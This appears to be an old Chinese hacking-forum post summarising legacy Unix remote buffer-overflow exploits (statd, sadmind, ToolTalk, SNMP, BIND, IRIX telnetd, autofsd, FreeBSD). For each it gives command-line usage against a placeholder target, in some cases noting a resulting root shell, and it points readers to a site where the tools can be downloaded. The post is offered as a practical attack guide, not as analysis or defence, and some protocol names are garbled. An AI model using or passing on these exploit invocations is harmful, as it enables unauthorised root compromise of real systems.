远程溢出总结 呵呵!用unix古老的远程溢出可算比较的多了! 下边我列出几个长用的远程溢出的exploit的用法! 目标主机一律用128.0.0.1代替! 1 statdu[vdp]redhat6.xrpc status远程溢出! 溢出程序: statdx 用法:./statdx -d 0 128.0.0.1或者 ./statdx -d 1 128.0.0.1或者 ./statdx -d 2 128.0.0.1或者 2 sadmind[vdp]sun solaris sparc 2.6.2.7远程溢出 溢出程序: sadmindxbrute 用法 ./sadmindxbrute (主机类型参数) 128.0.0.1 主机参数 1 x86 2.6 2 x86 7.0 3 sparc 2.6 4 sparc 7.0 3 ttdb[tcp]sun solaris 2.3 2.4 2.5 2.5.12.6远程溢出 所用程序 ttds(已经改名)流光iv的exploit内可以找到 用法 ./ttds 128.0.0.1 80(攻击断口设置为80)-v6
4 snmp[bdp]sun solaris sparc 7.0/8.8远程溢出 所用程序 snmpxmid 用法: ./snmpxmid 128.0.0.1 -v 7 5 bind 远程溢出 程序bind 用法 ./bind 128.0.0.1 -e 6 irix的telnet远程溢出(这个可能用流光iv扫描不到) 所用程序telnetd 用法 ./telnetd 128.0.0.1 7 utofsd[vdp]bsd autofsd远程溢出,tcp 530 root shell 所用程序 utofsd 用法:./utofsd 128.0.0.1 8 freebsd远程溢出 这个可以通过www.paching.net/liumy写的bsd攻击程序在winnt下使用方法 bsd 128.0.0.1 其他的远程溢出程序也不麻烦 你只要把程序编译好之后输入 ./程序名 --h就可以看到帮助了! 以上所用的脚本均可以在www.hack.co.za下载到!
|